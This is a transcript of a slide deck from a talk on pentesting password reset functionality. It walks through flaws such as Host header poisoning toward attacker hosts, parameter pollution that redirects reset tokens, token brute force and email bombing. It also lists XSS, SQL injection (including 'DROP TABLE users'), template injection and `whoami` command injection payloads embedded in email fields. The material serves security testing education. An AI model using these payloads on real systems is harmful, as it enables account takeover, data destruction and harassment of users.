Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Pentesting Password Reset Functionality

Anugrah SR
January 23, 2023

Pentesting Password Reset Functionality

This talk was part of RESET Hacker's Kerala's first session. Here we discuses about
Functionality hacking methodology:https://github.com/Anugrahsr/Functionality-Hacker
What is the password reset functionality
Flow the password reset functionality
What can go wrong
Mindmap, Checklist etc.

Recording can be found here: https://anugrahsr.in/

Anugrah SR

January 23, 2023
Tweet

More Decks by Anugrah SR

Other Decks in Technology

Transcript

  1. PENTESTING
    PASSWORD RESET
    FUNCTIONALITY
    - Anugrah SR

    View full-size slide

  2. ANUGRAH S R
    Cyber Security consultant at The SecOps Group
    Passive Bugbounty Hunter
    Synack Red Team Member
    Twitter: @cyph3r_asr | LinkedIn: anugrah-sr | Web: anugrahsr.in
    Blog: anugrahsr.in | p1boom.com
    Connect with me

    View full-size slide

  3. Functionality hacking methodology
    What is the password reset functionality
    Flow the password reset functionality
    What can go wrong
    Mindmap, Checklist
    AGENDA

    View full-size slide

  4. LOOKING FOR BUGS?
    Bug Type
    Functionality Wise ?
    XSS
    SQL Injection
    SSRF
    Hacking methodology

    View full-size slide

  5. LOOKING FOR BUGS?
    https://github.com/Anugrahsr/Functionality-Hacker

    View full-size slide

  6. Spot the Common One!

    View full-size slide

  7. Forgot Password?

    View full-size slide

  8. WHAT IS PASSWORD RESET?
    If a Web-app have a login, there be a password reset function!
    In order to implement a proper user management system, systems
    integrate a Forgot Password service that allows the user to request a
    password reset.

    View full-size slide

  9. WHAT COULD POSSIBLY
    GO WRONG HERE RIGHT?
    Let's see!

    View full-size slide

  10. Me and MAALP found this interesting password reset page
    OTP

    View full-size slide

  11. WHAT IF?
    Let's look at the impact
    FULL ACCOUNT
    TAKEOVER
    TOKEN LEAKAGE


    PARAMETER POLLUTION


    SQL INJECTION


    GUESSABLE TOKEN


    MORE..


    View full-size slide

  12. PASSWORD RESET POISONING
    If you have a Host Header attack, Request a password with evil host!
    Websites that handle the value of the Host header in an unsafe way
    POST https://example.com/reset.php
    HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    POST https://example.com/reset.php
    HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: evilhost.com

    View full-size slide

  13. $resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/resetpassword.php?token=12345678-1234-1234..";

    View full-size slide

  14. $resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/resetpassword.php?token=12345678-1234-1234..";

    View full-size slide

  15. POST https://example.com/reset.php
    HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com:@evilhost.com
    POST https://example.com/reset.php
    HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    X-Forwarded-Host: attacker.com
    POST https://example.com/reset.php
    HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    Host: attacker.com
    POST https://example.com/reset.php
    HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: [email protected]
    Lab:
    https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning

    View full-size slide

  16. ATO: PARAMETER MANIPULATION
    We can pollute the parameter to get the reset token to attacker email
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    [email protected]&[email protected]
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    [email protected]

    View full-size slide

  17. POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    [email protected]&[email protected]
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    [email protected]
    [email protected]
    [email protected]

    View full-size slide

  18. RESPONSE MANIPULATION
    Replace Bad Response With Good One
    HTTP/1.1 401 Unauthorized
    (“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
    HTTP/1.1 200 OK
    (“message”:”success”,”statusCode:200,”errorDescription”:”Success”)

    View full-size slide

  19. TOKEN LEAKAGE IN RESPONSE
    Check the response to see if the token is leaked in response
    Add json extension to endpoint, eg: resetpassword.json
    GET /passwordReset.json HTTP/1.1
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    {
    "email" : "[email protected]" ,
    "token" : ******,
    "success" : "true"
    }
    GET /passwordReset HTTP/1.1
    email [email protected]
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8

    View full-size slide

  20. TOKEN LEAKAGE
    Check the response to see if the token is leaked in response/js files etc
    1 - Set Up Burp In Browser One
    2 - Reset Password In Browser One
    3 - Open The Password Reset Email In Browser Two
    4 - Copy The Token
    5 - Search Your Burp History For The Token

    View full-size slide

  21. RESET TOKEN LEAK VIA REFERER
    Once you visit the reset token link, click on any third party website eg Facebook
    Intercept the requst and check the referer header

    View full-size slide

  22. RESET TOKEN LEAK VIA REFERER
    Once you visit the reset token link, click on any third party website eg Facebook
    Intercept the requst and check the referer header
    GET /home HTTP/1.1
    Host: www.third_party.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Referer: https://company.com/resetpass?token=123-456-123-456
    Origin: https://www.company.com

    View full-size slide

  23. GUESSABLE TOKEN
    Find out how password reset token is generated like Timestamp , UserID , Email
    and Weak Cryptography
    POST /resetPassword HTTP/1.1
    Host: www.company.com
    Content-Type: application/x-www-form-urlencoded
    Origin: https://www.company.com
    Content-Length: Number
    [email protected]&token=

    View full-size slide

  24. BRUTE FORCE THE TOKEN
    Find out how password reset token by force!
    Use IP-Rotate, additional headers etc
    POST /resetPassword/change HTTP/1.1
    Host: www.company.com
    Content-Type: application/x-www-form-urlencoded
    Origin: https://www.company.com
    Content-Length: Number
    [email protected]&token=FUZZ&newpass=DontHackme!

    View full-size slide

  25. EXPERIMENT WITH THE TOKEN
    experiment with the password reset token!
    Remove the token completely
    Change the token to value 0 or 1 or -1 etc
    Use token value = null/nil
    Use expired token
    Try array of old tokens
    Use sequencer to check if the token have any patterns
    Add special characters
    Change request method/ content type

    View full-size slide

  26. POST /passwordreset HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: Number
    email=test@gmáil.com.id.burpcollaborator.net
    IDN HOMOGRAPH ATTACK
    Create an account with email [email protected]
    Now generate reset password link for email test@gmáil.com.burpcollaborator.net

    View full-size slide

  27. LIST OF PAYLOADS AS EMAIL ADDRESSES
    test+(alert(0))@gmail.com
    test(alert(0))@gmail.com
    test@gmail(alert(0)).com
    "alert(0)"@gmail.com
    "<%= 7 * 7 %>"@gmail.com
    test+(${{7*7}})@gmail.com
    "' OR 1=1 -- '"@gmail.com
    "test); DROP TABLE users;--"@gmail.com
    test@[id.collaborator.net]
    %@gmail.com

    View full-size slide

  28. XSS
    Test for XSS with [email protected]">alert(document.domain)
    payload
    GET /[email protected]">alert(document.domain) HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Referer: https://previous.com/path
    Origin: https://www.company.com

    View full-size slide

  29. GET /[email protected]'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0, sunil
    Content-Type: application/x-www-form-urlencoded
    Referer: https://previous.com/path
    Origin: https://www.company.com
    TIME BASED SQL INJECTION

    View full-size slide

  30. OS COMMAND INJECTION
    Reset password with email test@`whoami`.id.burpcollaborator.net
    POST /passwordreset HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: Number
    email=test@`whoami`.id.collaborator.net

    View full-size slide

  31. IDOR
    Test with your reset token and victim's email id/User-Id.
    POST /passwordreset HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: Number
    [email protected]&token=
    POST /passwordreset HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: Number
    [email protected]&token=

    View full-size slide

  32. XXE
    If password reset endpoint supports both json and xml
    Use Content Type Converter extension to change from json to xml, add your payload
    POST /resetPassword/change HTTP/1.1
    Host: www.company.com
    Content-Type: application/xml

    %asd;%c;]>
    %rrr;**********

    View full-size slide

  33. MFA AUTO DISABLING
    Sometimes MFA are auto-disabled after Password reset is done
    Enable 2FA
    Logout
    Password Reset
    2FA is auto disabled

    View full-size slide

  34. SESSION EXPIRATION
    Test for insufficient session expiration after password change
    Open account in two different browsers
    In browser1 reset the password
    See if the session is expired in browser2

    View full-size slide

  35. USER ENUMERATION
    Enumerate username/email id based on difference in response by the webapp
    invalid email/username : user doesn't exist
    valid email/username: Password reset link is send to your email

    View full-size slide

  36. MISSING RATELIMITING
    Email bombing!
    send the password reset request to intruder
    start the attack
    Look at the choas you created in victim's email account
    Tip: [email protected]

    View full-size slide

  37. RE USABLE TOEKN
    Check if the token can be reused, if it's expired.
    Request password reset
    Dont use the link
    change the email address to a new email in account settings
    See if old token can be used

    View full-size slide

  38. MINDMAPS
    https://twitter.com/N008x/status/1302515523557548032/photo/1 - Gaurav Popalghat
    https://xmind.app/m/nZwbdk - Harsh Bothra/

    View full-size slide

  39. RESOURCES
    10 Password Reset Flaws
    Anugrah SR
    Blog
    Slides
    Functionality Hacker
    ATO Password Reset
    Mahmoud M. Awali
    Slides
    Common Vulnerabilities In Forget Password
    Harsh Bothra
    MindMap

    View full-size slide

  40. https://github.com/Anugrahsr/Functionality-Hacker

    View full-size slide

  41. YOU'RE ONLY AS STRONG AS
    YOUR PASSWORD!

    View full-size slide

  42. THANKS FOR LISTENING TO ME!
    Twitter
    @cyph3r_asr
    LinkedIn
    @anugrah-sr
    www.anugrahsr.in
    Slides will be available here:

    View full-size slide